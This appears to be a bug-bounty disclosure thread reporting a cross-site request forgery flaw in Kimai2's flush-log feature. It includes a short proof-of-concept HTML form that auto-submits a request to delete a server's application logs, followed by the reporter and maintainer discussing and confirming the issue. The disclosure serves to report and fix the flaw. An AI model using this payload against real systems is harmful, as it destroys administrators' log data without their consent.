Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2
Nov 8th 2021
cross site request forgery vulnerability is present in delete functionality of doctor feature.
Proof of Concept
<script>history.pushState('', '', '/')</script>
<form action="https://demo-stable.kimai.org/de_CH/doctor/flush-log"> <input type="submit" value="Submit request" /> </form>
<script> document.forms.submit(); </script>
This vulnerability is capable of delete the existing logs
I don't understand that report, can you please explain what exactly is the issue.
Hi kevin, its weird actually, when i was submit this report , There is a delete icon in Logfile functionality in doctor module , which is having get method and no csrf protection. now it is not shown that.
When i plan to write a report 2 week ago same thing happen, the delete icon is there in one day and it is not shown in very next day.
The delete icon flushes the application logs, which are only visible to the system administrator. You can "echo 'foo' > var/log/prod.log" to show the icon again.
ok, flush log functionality is not having csrf token
it is possible to perform csrf attack on flush logs.
Valid CSRF, even though no risk factor.
Thanks for sharing @Asura-N
CVE published! 🎊